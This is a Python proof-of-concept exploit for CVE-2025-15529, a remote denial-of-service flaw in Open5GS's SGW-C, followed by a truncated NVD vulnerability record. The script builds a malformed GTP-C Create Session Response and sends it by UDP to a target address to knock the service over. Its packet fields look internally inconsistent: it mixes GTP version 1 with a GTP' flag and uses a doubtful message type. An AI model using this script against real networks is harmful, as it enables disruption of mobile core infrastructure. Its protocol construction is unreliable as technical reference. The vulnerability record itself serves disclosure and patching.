CVE-2025-15529

#!/usr/bin/env python3 """ CVE-2025-15529 PoC - Open5GS S5C Create Session Response DoS Reference: https://github.com/open5gs/open5gs/issues/4226 Note: This PoC demonstrates the vulnerability concept. Modify GTP-C messages accordingly. """ import socket import struct import sys def create_gtpc_create_session_response(teid, sequence): """ Create a malicious GTP-C Create Session Response message that triggers the vulnerability in sgwc_s5c_handle_create_session_response """ # GTP-C Header version = 0x01 # GTP version 1 protocol_type = 0x01 # GTP' (1) message_type = 0x36 # Create Session Response length = 0x0000 # Will be set later # Flags flags = (version << 5) | (protocol_type << 4) # Sequence number (3 bytes) seq = struct.pack('!I', sequence)[1:4] # Spare spare = b'\x00\x00\x00' # TEID teid_packed = struct.pack('!I', teid) # Information Elements - Malformed/missing required IEs # Missing or malformed Bearer Context IE can trigger the vulnerability ies = b'\x00' * 10 # Malformed IEs message_body = seq + spare + teid_packed + ies length = len(message_body) # Build header with correct length header = bytes([flags, message_type]) + struct.pack('!H', length) + message_body return header def exploit(target_ip, target_port=2123): """ Send malicious GTP-C Create Session Response to trigger DoS """ sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) teid = 0x00000001 sequence = 0x000001 payload = create_gtpc_create_session_response(teid, sequence) print(f"[*] Sending malicious Create Session Response to {target_ip}:{target_port}") print(f"[*] Payload length: {len(payload)} bytes") try: sock.sendto(payload, (target_ip, target_port)) print("[+] Malicious packet sent successfully") print("[+] Check if Open5GS SGWC service is still responsive") except Exception as e: print(f"[-] Error sending packet: {e}") finally: sock.close() if __name__ == "__main__": if len(sys.argv) < 2: print(f"Usage: {sys.argv[0]} <target_ip> [port]") sys.exit(1) target = sys.argv[1] port = int(sys.argv[2]) if len(sys.argv) > 2 else 2123 exploit(target, port)

{"cve": {"id": "CVE-2025-15529", "sourceIdentifier": "[email protected]", "published": "2026-01-16T22:16:18.437", "lastModified": "2026-02-23T09:16:27.717", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was found in Open5GS up to 2.7.6. Affected by this issue is the function sgwc_s5c_handle_create_session_response of the file src/sgwc/s5c-handler.c. Performing a manipulation results in denial of service. Remote exploitation of the attack is possible. The exploit has been made public and could be used. The patch is named b19cf6a2dbf5d30811be4488bf059c865bd7d1d2. To fix this issue, it is recommended to deploy a patch."}, {"lang": "es", "value": "Una vulnerabilidad fue encontrada en Open5GS hasta la versión 2.7.6. Afectada por este problema es la función sgwc_s5c_handle_create_session_response del archivo src/sgwc/s5c-handler.c. Realizar una manipulación resulta en denegación de servicio. La explotación remota del ataque es posible. El exploit ha sido hecho público y podría ser usado. El parche es nombrado b19cf6a2dbf5d30811be4488bf059c865bd7d1d2. Para arreglar este problema, se recomienda desplegar un parche."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "baseScore": 5.0, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "PARTIAL"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 10.0, "impactScore": 2.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-404"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:open5gs:open5gs:*:*:*:*:*:*:*:*", "versionEndIncluding": "2.7.6", "matchCriteriaId": "9C77332A-BAA3-4FE7-A237-B87F175C6F48"}]}]}], "references": [{"url": "https://github.com/open5gs/open5gs/", "source": "[email protected]"}, {"url": "https://github.com/open5gs/open5gs/commit/b19cf6a2dbf5d30811be4488bf059c865bd7d1d2", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/open5gs/open5gs/issues/4226", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Vendor Advisory"]}, {"url": "https://github.c ... (truncated)